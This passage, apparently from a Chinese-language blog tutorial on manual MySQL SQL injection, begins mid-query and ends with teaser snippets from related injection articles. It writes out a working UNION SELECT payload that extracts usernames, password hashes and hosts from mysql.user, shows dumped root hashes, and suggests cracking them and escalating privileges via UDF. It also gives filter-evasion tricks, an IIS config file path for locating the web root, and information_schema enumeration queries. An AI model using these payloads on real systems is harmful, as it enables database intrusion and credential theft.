char))),0x3a,unhex(hex(cast(password as char))),0x3a,unhex(hex(cast(host
as char)))) from mysql.user
(hex(cast((user as char))) 把user使用char型別檢視然後轉換為hex 這樣得出的結果是hex
但是查詢要是銘文 所以還要unhex,這樣即可查詢到使用者.完善之後
root*81f5e21e35407d884a6cd4a731aebfb6af209e1blocalhost
為了好看,可以加個空格或者冒號
root:*81f5e21e35407d884a6cd4a731aebfb6af209e1b:localhost
然後我們補充到注入點即為
and 1=2 union select 1,2,(select concat(unhex(hex(cast(user as
char))),0x3a,unhex(hex(cast(password as char))),0x3a,unhex(hex(cast(host
as char)))) from mysql.user limit 0,10),4,5,6,7,8,9,10
沒有設定limit 顯示的行數,結果爆出,害得我找半天。。
設定一下limit即可.
root:*da042342e98014f25016db9acb43bd9ace038343:localhost
之後破解hash即可udf提權。
cmd5 就是這麼不給力!
7.更多函式、技巧
+ 可以代替空格
比如 select 1,2,3,4,5 可以轉換為 select+1,2,3,4,5
在注入點id前面加個 - 號 可以代替 and 1=2
我想想。。。嗯。。實在想不到了。暫時就這麼多吧。有問題可以單獨和諧。。
----------------------------------------------
補充乙個技巧:
iis可以通過讀取iis配置檔案找到**路徑!
c:\\windows\\system32\\inetsrv\\metabase.xml
手工注入 MySQL手工注入實戰和分析
通過 和構造 and 1 1 和 and 1 2 檢視頁面是否報錯。這裡通過and 1 1 發現頁面正常。如下圖。接下來,咱們再構造 and 1 2 發現頁面報錯,說明頁面存在注入點。如下圖。通過 order by 語句,如果後面輸入的數字大於資料庫的字段數,頁面就會報錯,通過這個,咱們先輸入 or...
mysql手工注入
元資料庫 information schema其中儲存著其他所有資料庫的資訊 其中的表非常多 schemata 存放所有資料庫的名字 tables 用於存放所有資料表的名字 columns 存放所有欄位的名字 這些表裡面存放的資訊非常多,如果用select from tables 查詢會出現非常多劫...
mysql手工注入方法
mysql內建資料庫結構 功能名稱 查詢語句 查庫select schema name from information schema.schemata 查表select table name from information schema.tables where table schema 庫名 ...